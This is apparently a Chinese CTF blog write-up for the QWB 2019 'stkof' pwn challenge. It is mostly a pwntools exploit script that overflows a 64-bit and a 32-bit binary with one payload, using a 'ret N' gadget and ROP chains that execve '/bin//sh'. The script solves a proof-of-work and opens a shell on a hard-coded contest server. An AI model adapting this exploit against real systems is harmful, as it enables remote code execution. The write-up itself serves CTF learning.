强网杯2019
ROPgadget --binary _stkof --ropchain
ROPgadget --binary __stkof --ropchain
加了拟态防御,需要同一个payload来pwn掉两个程序
64 位按正常的 ROP 打；32 位在前面加一个 RET NUMBER（`ret N`）gadget 跳过栈顶的 64 位 payload，落到其后面的 32 位 payload，从而 getshell。
攻击脚本:
from pwn import *
# `from pwn import *` deliberately stays first: pwntools also exports a `pack`
# helper, and this script relies on the struct.pack imported below shadowing it.
from struct import pack
from hashlib import sha256
import binascii
import itertools
import os
import random
import string
import subprocess
import sys
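def ropchain(bit):
    """Return the ROP chain for the 64-bit or the 32-bit challenge binary.

    Both chains follow the ``ROPgadget --ropchain`` layout produced by the
    commands at the top of the writeup: stage ``/bin//sh`` in ``.data`` and a
    zero word right after it via ``mov [reg], reg`` gadgets, load the argument
    registers from ``.data`` / ``.data + 8``, then issue the system call
    (number ``0x3b`` on x86-64, ``11`` on i386 -- execve on Linux).

    Args:
        bit: 64 or 32, selecting the target binary.

    Returns:
        The packed chain as ``bytes`` (a ``str`` on Python 2), or ``None`` when
        ``bit`` is neither 64 nor 32.

    The chain is assembled from ``bytes`` pieces only (``struct.pack`` and
    bytes literals, no pwntools ``p64``/``p32``), so it builds on Python 3 as
    well; the original ``'' + pack(...)`` concatenation raised ``TypeError``
    there.
    """
    if bit == 64:
        def q(value):
            # One 8-byte little-endian stack word.
            return pack('<Q', value)

        chain = [
            q(0x0000000000405895),  # pop rsi ; ret
            q(0x00000000006a10e0),  # @ .data
            q(0x000000000043b97c),  # pop rax ; ret
            b'/bin//sh',
            q(0x000000000046aea1),  # mov qword ptr [rsi], rax ; ret
            q(0x0000000000405895),  # pop rsi ; ret
            q(0x00000000006a10e8),  # @ .data + 8
            q(0x0000000000436ed0),  # xor rax, rax ; ret
            q(0x000000000046aea1),  # mov qword ptr [rsi], rax ; ret  (zero word after the string)
            q(0x00000000004005f6),  # pop rdi ; ret
            q(0x00000000006a10e0),  # @ .data
            q(0x0000000000405895),  # pop rsi ; ret
            q(0x00000000006a10e8),  # @ .data + 8
            q(0x000000000043b9d5),  # pop rdx ; ret
            q(0x00000000006a10e8),  # @ .data + 8
            # The next two gadgets are overwritten by the `pop rax` that follows
            # (per their comments); they are kept so the chain bytes are unchanged.
            q(0x0000000000436ed0),  # xor rax, rax ; ret
            q(0x0000000000461110),  # mov rax, 5 ; ret
            q(0x000000000043b97c),  # pop rax ; ret
            q(0x3b),                # syscall number
            q(0x0000000000461645),  # syscall ; ret
        ]
        return b''.join(chain)

    if bit == 32:
        def d(value):
            # One 4-byte little-endian stack word.
            return pack('<I', value)

        chain = [
            d(0x0806e9cb),  # pop edx ; ret
            d(0x080d9060),  # @ .data
            d(0x080a8af6),  # pop eax ; ret
            b'/bin',
            d(0x08056a85),  # mov dword ptr [edx], eax ; ret
            d(0x0806e9cb),  # pop edx ; ret
            d(0x080d9064),  # @ .data + 4
            d(0x080a8af6),  # pop eax ; ret
            b'//sh',
            d(0x08056a85),  # mov dword ptr [edx], eax ; ret
            d(0x0806e9cb),  # pop edx ; ret
            d(0x080d9068),  # @ .data + 8
            d(0x08056040),  # xor eax, eax ; ret
            d(0x08056a85),  # mov dword ptr [edx], eax ; ret  (zero word after the string)
            d(0x080481c9),  # pop ebx ; ret
            d(0x080d9060),  # @ .data
            d(0x0806e9f2),  # pop ecx ; pop ebx ; ret
            d(0x080d9068),  # @ .data + 8
            d(0x080d9060),  # padding without overwriting ebx
            d(0x0806e9cb),  # pop edx ; ret
            d(0x080d9068),  # @ .data + 8
            d(0x08056040),  # xor eax, eax ; ret  (overwritten by the pop eax below; kept for identical bytes)
            d(0x080a8af6),  # pop eax ; ret
            d(11),          # syscall number
            d(0x080495a3),  # int 0x80
        ]
        return b''.join(chain)

    return None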
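def _solve_pow(prefix, expected):
    """Recover the server's proof-of-work answer by brute force.

    The server prints ``sha256(prefix + xxx).hexdigest()`` together with the
    hex of the 5-byte ``prefix``; ``xxx`` is three unknown bytes. Every value
    0x00..0xFF is tried for each byte -- the original loops used
    ``xrange(0, 0xff)`` and so never tried 0xFF, which could miss the answer.

    Args:
        prefix: the un-hexed prefix bytes.
        expected: the 64-character hex digest to match (``str``; a ``bytes``
            value on Python 3 is decoded before comparison).

    Returns:
        Hex encoding of ``prefix + xxx``, which is what the server expects back.

    Raises:
        ValueError: when no suffix matches, instead of returning ``None`` and
            sending that down the socket.
    """
    if isinstance(expected, bytes) and not isinstance(expected, str):
        expected = expected.decode('ascii')  # Python 3 tubes return bytes
    for candidate in itertools.product(range(256), repeat=3):
        attempt = prefix + bytes(bytearray(candidate))
        if sha256(attempt).hexdigest() == expected:
            return binascii.hexlify(attempt)
    raise ValueError('no proof-of-work suffix matched the expected digest')


def remote_attack():
    """Solve the PoW, send the team token, then deliver the dual-arch payload.

    One payload has to work against both binaries (see the writeup text): the
    32-bit binary returns into ``ret_10c``, a ``ret N`` gadget that hops over
    the 64-bit chain into the 32-bit chain placed at the end, while the 64-bit
    binary executes the 64-bit chain laid out in the same bytes. The endpoint
    and token are the ones the author used during the 2019 contest.
    """
    team_token = 'b67f9528c4a5c8cf7b32d064e0486493'
    ret_10c = 0x8099bbe  # ret N gadget; the author also noted 0x0807da0a (ret 0x126)
    ret = 0x806e9cc      # plain ret

    # Build the payload before connecting so a failure here cannot leave a
    # half-used session behind.
    rop64 = ropchain(64)
    rop32 = ropchain(32)
    payload = b''.join([
        b'a' * 0x110,                    # overflow filler; offset from the author's analysis
        p32(ret_10c),
        p32(ret),
        rop64,
        b'\x00' * (0x10c - len(rop64)),  # presumably pads to where the ret N lands (0x10c, as in ret_10c)
        rop32,
    ])

    io = remote('49.4.51.149', 25391)
    io.recvuntil('hexdigest()=')
    expected = io.recv(64)
    io.recvuntil("ncode('hex')=")
    prefix = binascii.unhexlify(io.recv(10))
    answer = _solve_pow(prefix, expected)
    print('skr:: %s' % answer)
    io.sendline(answer)
    sleep(0.5)
    io.sendline(team_token)
    print('Send team_token successfully!')
    io.send(payload)
    sleep(0.1)
    io.interactive()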
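# Only run the attack when executed as a script, so the chain builders can be
# imported and inspected without opening a connection.
if __name__ == '__main__':
    remote_attack()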
文章标题:强网杯2019
本文作者:枫云李
发布时间:2020-01-16, 02:06:12
最后更新:2020-04-11, 01:15:22
原始链接:https://primelyw.github.io/2020/01/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2019/版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。